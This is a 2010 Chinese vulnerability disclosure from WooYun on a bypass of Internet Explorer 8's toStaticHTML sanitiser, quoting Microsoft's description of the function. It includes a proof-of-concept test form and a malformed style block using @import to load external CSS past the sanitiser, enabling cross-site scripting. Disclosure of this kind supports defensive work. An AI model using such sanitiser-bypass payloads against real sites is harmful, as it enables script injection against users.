当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0189

漏洞标题:IE8 toStaticHtml Bypass漏洞

相关厂商:微软

漏洞作者: 结界师

提交时间:2010-08-13 11:01

修复时间:2010-08-13 11:01

公开时间:2010-08-13 11:01

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-08-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-08-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

toStaticHtml是微软在IE8中新提供的一个接口,号称解决xss问题
http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-v-comprehensive-protection.aspx
<code>
Safer Mashups: HTML Sanitization
IE8 exposes a new method on the window object named toStaticHTML. When a string of HTML is passed to this function, any potentially executable script constructs are removed before the string is returned. Internally, this function is based on the same technologies as the server-side Microsoft Anti-Cross Site Scripting Library mentioned previously.
So, for example, you can use toStaticHTML to help ensure that HTML received from a postMessage call cannot execute script, but can take advantage of basic formatting:
document.attachEvent('onmessage',function(e) {
if (e.domain == 'weather.example.com') {
spnWeather.innerHTML = window.toStaticHTML(e.data);
}
}
Calling:
window.toStaticHTML("This is some <b>HTML</b> with embedded script following... <script>alert('bang!');</script>!");
will return:
This is some <b>HTML</b> with embedded script following... !
</code>
80sec在其中发现一个安全缺陷可以导致绕过,所有使用tostatichtml的将依然导致xss

详细说明:

良好的愿望不代表良好的实现,tostatichtml最终的实现依赖于字符串的正则分析和最终浏览器真实的解析,逻辑的不同就可能导致绕过。
微软实现的正则里存在问题加上很勺的IE本身的不规范性导致绕过

漏洞证明:

<script type="text/javascript">
function fuckie()
{
var szInput = document.shit.input.value;
var szStaticHTML = toStaticHTML(szInput);
ResultComment = szStaticHTML;
document.shit.output.value = ResultComment;
}
</script>
<form name="shit">
<textarea name='input' cols=40 rows=20>
</textarea>
<textarea name='output' cols=40 rows=20>
</textarea>
<input type=button value="fuck_me" name="fuck" onclick=fuckie();>
</form>

<style>
}@import url('//127.0.0.1/1.css');aaa
{;}
</style>
<div id="x">Fuck Ie</div>


这样就可以引入1.css,然后随便xsssssssssssssss

修复方案:

自己看着修补吧,又不只一个case :)

版权声明:转载请注明来源 结界师@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)